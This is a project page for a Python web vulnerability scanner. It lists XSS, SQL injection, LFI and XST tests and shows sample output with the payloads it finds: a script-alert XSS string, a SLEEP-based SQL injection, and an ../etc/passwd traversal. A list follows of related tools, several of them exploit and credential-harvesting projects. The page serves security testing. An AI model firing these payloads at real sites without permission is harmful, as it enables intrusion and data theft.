Vuln Scanner With Python

Overview

VulnScanner

Code

Version Language GitHub Repo stars


Features

Web Application Firewall (WAF) detection.

Cross Site Scripting (XSS) tests.

SQL injection time based test.

SQL injection error based test.

Local File Inclusion (LFI) test.

Cross Site Tracing (XST) test.


How To Run

git clone https://github.com/NullS0UL/VulnScanner

cd VulnScanner

python3 vulnscan.py http://example.com/page.php?cat=1

Example of Output

python3 vulnscan.py http://example.com/page.php?cat=1

[*] No WAF Detected.

Target: http://example.com/page.php?cat=1

Powered: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1

[!] Testing Cross Site Scripting (XSS)
[!] 10 Payloads.
[+] 9 Payloads were found.

[*] Payload found!
[!] Payload: <script>alert("inject")</script>
[!] POC: http://example.com/page.php?cat=<script>alert("inject")</script>

[*] Payload found!
[!] Payload: %3Cscript%3Ealert%28%22inject%22%29%3C%2Fscript%3E
[!] POC: http://example.com/page.php?cat=%3Cscript%3Ealert%28%22inject%22%29%3C%2Fscript%3E

[!] Testing SQLInjection
[*] Blind SQL injection time based found!
[!] Payload: 1-SLEEP(2)
[!] POC: http://example.com/page.php?cat=1-SLEEP(2)

[*] SQL Error found.
[!] Payload: '
[!] POC: http://example.com/page.php?cat='

[!] Testing Local File Inclussion (LFI)
[*] Payload found!
[!] Payload: ../../../../etc/passwd
[!] POC: http://example.com/page.php?cat=../../../../etc/passwd


[!] Testing Cross Site Tracing (XST)
[*] This site seems vulnerable to Cross Site Tracing (XST)!


Discaimer

Usage of the VulnScanner for attack targets without prior mutual consent is illegal. 
It is the end user's responsability to obey all applicable local, state, federal and international laws. 
Developer assume no liability and not responsible for any misuse or damage caused by this program.

Find me on

Facebook Telegram

Visit my Blog Site

  • Blogs
  • Owner
    < / N u l l S 0 U L >
    Use your brain , Make GOOGLE your friend 😘
    < / N u l l S 0 U L >
    Advanced subdomain scanner, any domain hidden subdomains

    little advanced subdomain scanner made in python, works very quick and has options to change the port u want it to connect for

    Nano 5 Nov 23, 2021
    Lnkbomb - Malicious shortcut generator for collecting NTLM hashes from insecure file shares

    Lnkbomb Lnkbomb is used for uploading malicious shortcut files to insecure file

    Joe Helle 216 Jan 08, 2023
    😭 WSOB is a python tool created to exploit the new vulnerability on WSO2 assigned as CVE-2022-29464.

    😭 WSOB (CVE-2022-29464) 😭 WSOB is a python tool created to exploit the new vulnerability on WSO2 assigned as CVE-2022-29464. CVE-2022-29464 details:

    0p 25 Oct 14, 2022
    Grafana-POC(CVE-2021-43798)

    Grafana-Poc 此工具请勿用于违法用途。 一、使用方法:python3 grafana_hole.py 在domain.txt中填入ip:port 二、漏洞影响范围 影响版本: Grafana 8.0.0 - 8.3.0 安全版本: Grafana 8.3.1, 8.2.7, 8.1.8,

    8 Jan 03, 2023
    Remote Desktop Protocol in Twisted Python

    RDPY Remote Desktop Protocol in twisted python. RDPY is a pure Python implementation of the Microsoft RDP (Remote Desktop Protocol) protocol (client a

    Sylvain Peyrefitte 1.6k Dec 30, 2022
    log4j burp scanner

    log4jscanner log4j burp插件 特点如下: 0x01 基于Cookie字段、XFF头字段、UA头字段发送payload 0x02 基于域名的唯一性,将host带入dnslog中 插件主要识别五种形式: 1.get请求,a=1&b=2&c=3 2.post请求,a=1&b=2&c=

    1 Jun 30, 2022
    Python sandbox runners for executing code in isolation aka snekbox.

    Python sandbox runners for executing code in isolation aka snekbox.

    Python Discord 164 Dec 20, 2022
    MITMSDR for INDIAN ARMY cybersecurity hackthon

    There mainly three things here: MITMSDR spectrum Manual reverse shell MITMSDR Installation Clone the project and run the setup file: ./setup One of th

    2 Jul 26, 2022
    Proof of Concept Exploit for ManageEngine ServiceDesk Plus CVE-2021-44077

    CVE-2021-44077 Proof of Concept Exploit for CVE-2021-44077: PreAuth RCE in ManageEngine ServiceDesk Plus 11306 Based on: https://xz.aliyun.com/t/106

    Horizon 3 AI Inc 25 Nov 09, 2022
    Website OSINT untuk mencari informasi dari email dan nomor telepon. Dibuat dengan React dan Flask.

    Inspektur Cari informasi mengenai email dan nomor telepon dengan mudah. Inspektur adalah aplikasi OSINT yang berguna untuk mencari informasi berdasark

    Bagas Wastu 36 Dec 04, 2022
    domato but as a website

    ROFL-FUZZER Ths is Domato, a DOM Fuzzer from Google, but hosted as an website It generates a instance of a newtab on the template given by the user ,

    Swapnadeep Som 18 Nov 22, 2021
    Grafana-0Day-Vuln-POC

    Grafana V8.0+版本存在未授权任意文件读取 0Day漏洞 - POC 1 漏洞信息 1.1 基本信息 漏洞厂商:Grafana 厂商官网:https://grafana.com/ 1.2 漏洞描述 Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Gr

    mik1th0n 3 Dec 13, 2021
    How to exploit a double free vulnerability in 2021. 'Use-After-Free for Dummies'

    This bug doesn’t exist on x86: Exploiting an ARM-only race condition How to exploit a double free and get a shell. "Use-After-Free for dummies" In thi

    Stephen Tong 1.2k Dec 25, 2022
    Exploit and Check Script for CVE 2022-1388

    F5-CVE-2022-1388-Exploit Exploit and Check Script for CVE 2022-1388 Usage Check against single host python3 CVE-2022-1388.py -v true -u target_url At

    Andy Gill 52 Dec 22, 2022
    Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)

    Pachine Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation). Installtion $ pip3 install impacket Usage Impacket v0.9.23 -

    Oliver Lyak 250 Dec 31, 2022
    Hacktricks - Welcome to the page where you will find each trick/technique/whatever I have learnt in CTFs, real life apps, and reading researches and news.

    Hacktricks - Welcome to the page where you will find each trick/technique/whatever I have learnt in CTFs, real life apps, and reading researches and news.

    Carlos Polop 5.8k Jan 07, 2023
    Auto Tor Ip Changer

    AutoTor Auto Tor Ip Changer for Linux! git clone https://github.com/Arest7/AutoTor cd AutoTor pip install -r requirements.txt python3 AutoTor.py follo

    Ken Ryuguji 3 Jan 23, 2022
    XSS scanner in python

    DeadXSS XSS scanner in python How to Download: Step 1: git clone https://github.com/Deadeye0x/DeadXSS.git Step 2: cd DeadXSS Step 3: python3 DeadXSS.p

    2 Jul 17, 2022
    A traceroute tool that also displays IP information

    infotr A traceroute tool that also displays IP information. This tool has only been tested on Linux. Quick Start First, install this tool from PyPI. p

    K4YT3X 10 Oct 29, 2022
    Scan publicly accessible assets on your AWS cloud environment

    poro Description Scan for publicly accessible assets on your AWS environment Services covered by this tool: AWS ELB API Gateway S3 Buckets RDS Databas

    9rnt 134 Dec 16, 2022